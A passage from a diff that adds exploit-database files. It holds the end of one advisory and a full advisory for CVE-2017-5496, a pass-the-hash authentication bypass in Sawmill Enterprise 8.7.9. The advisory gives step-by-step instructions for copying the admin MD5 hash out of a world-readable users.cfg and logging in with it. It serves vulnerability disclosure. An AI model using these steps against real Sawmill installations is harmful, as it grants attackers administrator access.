+11/20/2010 10:24 PM 88,576 NetBridge.dll +07/13/2009 08:51 PM 106,496 RegisterMCEApp.exe +06/10/2009 04:04 PM 129,528 segmcr.ttf + +etc... + + + +Network Access: +=============== +Remote + + + + +Severity: +========= +Medium + + + +Disclosure Timeline: +============================= +Vendor Notification: No reply +Also, the INSTALL file "Bugs? Comments? Tracker System link" is HTTP 404 +http://sourceforge.net/tracker/?group_id=156638 +February 18, 2017 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the +information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author +prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c) HYP3RLINX - +ApparitionSec diff --git a/platforms/windows/webapps/41395.txt b/platforms/windows/webapps/41395.txt new file mode 100755 index 000000000..3cb0948ce --- /dev/null +++ b/platforms/windows/webapps/41395.txt @@ -0,0 +1,138 @@ +[+] Credits: John Page AKA Hyp3rlinx +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/SAWMILL-PASS-THE-HASH-AUTHENTICATION-BYPASS.txt +[+] ISR: ApparitionSec + + + +Vendor: +=============== +www.sawmill.net + + + +Product: +======================== +Sawmill Enterprise v8.7.9 + +sawmill8.7.9.4_x86_windows.exe +hash: b7ec7bc98c42c4908dfc50450b4521d0 + +Sawmill is a powerful heirarchical log analysis tool that runs on every +major platform. + + +Vulnerability Type: +=================================== +Pass the Hash Authentication Bypass + + + +CVE Reference: +============== +CVE-2017-5496 + + + +Security Issue: +===================== +Sawmill suffers from a classic "Pass The Hash" vulnerability whereby an +attacker who gains access to the hashed user account passwords +can login to the Sawmill interface using the raw MD5 hash values, allowing +attackers to bypass the work of offline cracking +account password hashes. + + +This issue usually is known to affect Windows systems e.g. (NT Pass the +Hash/Securityfocus, 1997). However, this vulnerability can also +present itself in a vulnerable Web application. + +Sawmill account password hashes are stored under LogAnalysisInfo/ directory +in "users.cfg". + +e.g. + +users = { + root_admin = { + username = "admin" + password_checksum = "e99a18c428cb38d5f260853678922e03" + email_address = "" + + +This config file is stored local to the Sawmill application. However, if an +attacker gains access to a backup of the config that is +stored in some other location that is then compromised, it can lead to +subversion of Sawmills authenticaton process. + +Moreover, since 'users.cfg' file is world readble a regular non Admin +Windows user who logs into the system running sawmill can now grab +a password hash and easily login to the vulnerable application without the +needing the password itself. + + +How to test? + + +Sawmill running (default port 8988), log off Windows and switch to a +"Standard" Windows non Administrator user. + +1) Open "users.cfg" under Sawmills directory "C:\Program Files\Sawmill 8\LogAnalysisInfo" and copy the root_admin Admin password hash. + +2) Go to the Sawmill login page in web browser http://VICTIM-IP:8988/ enter username 'admin' and the hash, Tada! your Admin. + + +Finally, Sawmill passwords are hashed using vulnerable MD5 algorithm and no +salt. + + +e.g. + +password: abc123 +MD5 hash: +e99a18c428cb38d5f260853678922e03 + + + +Disclosure Timeline: +===================================== +Vendor Notification: January 7, 2017 +CVE-2017-5496 assigned : January 20 +Request status : January 26 +Vendor: Fix avail later in year still no ETA +Inform vendor public disclose date +February 18, 2017 : Public Disclosure + + + +Network Access: +=============== +Remote + + + +Impact: +====================== +Information Disclosure +Privilege Escalation + + + +Severity Level: +================ +High + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the +information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author +prohibits any malicious use of security related information +or exploits by the author or elsewhere. +